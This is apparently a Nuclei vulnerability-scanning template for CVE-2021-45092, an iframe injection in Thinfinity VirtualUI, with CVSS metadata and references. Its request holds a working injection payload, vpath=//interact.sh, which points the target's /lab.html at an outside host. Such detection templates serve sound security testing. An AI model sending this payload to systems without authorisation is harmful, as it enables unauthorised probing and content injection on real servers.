42 lines
1.5 KiB
YAML
42 lines
1.5 KiB
YAML
id: CVE-2021-45092
|
|
|
|
info:
|
|
name: Thinfinity Iframe Injection
|
|
author: danielmofer
|
|
severity: critical
|
|
description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
|
|
reference:
|
|
- https://github.com/cybelesoft/virtualui/issues/2
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-44848
|
|
- https://www.tenable.com/cve/CVE-2021-45092
|
|
- http://packetstormsecurity.com/files/166068/Thinfinity-VirtualUI-2.5.41.0-IFRAME-Injection.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-45092
|
|
cwe-id: CWE-74
|
|
epss-score: 0.05789
|
|
epss-percentile: 0.92543
|
|
cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: cybelesoft
|
|
product: thinfinity_virtualui
|
|
tags: packetstorm,iframe,thinfinity,tenable,cve,cve2021,injection
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/lab.html?vpath=//interact.sh"
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- ".*vpath.*"
|
|
- "thinfinity"
|
|
condition: and
|
|
|
|
# digest: 490a00463044022047700930db3bf516077ce60b4091fd35fb74002abb9edfa825b997e8cfd8a630022037e089c376c6807927da8a8ed5f7ea776f802f06d5954b790c1df76ab7bdd908:922c64590222798bb761d5b6d8e72950
|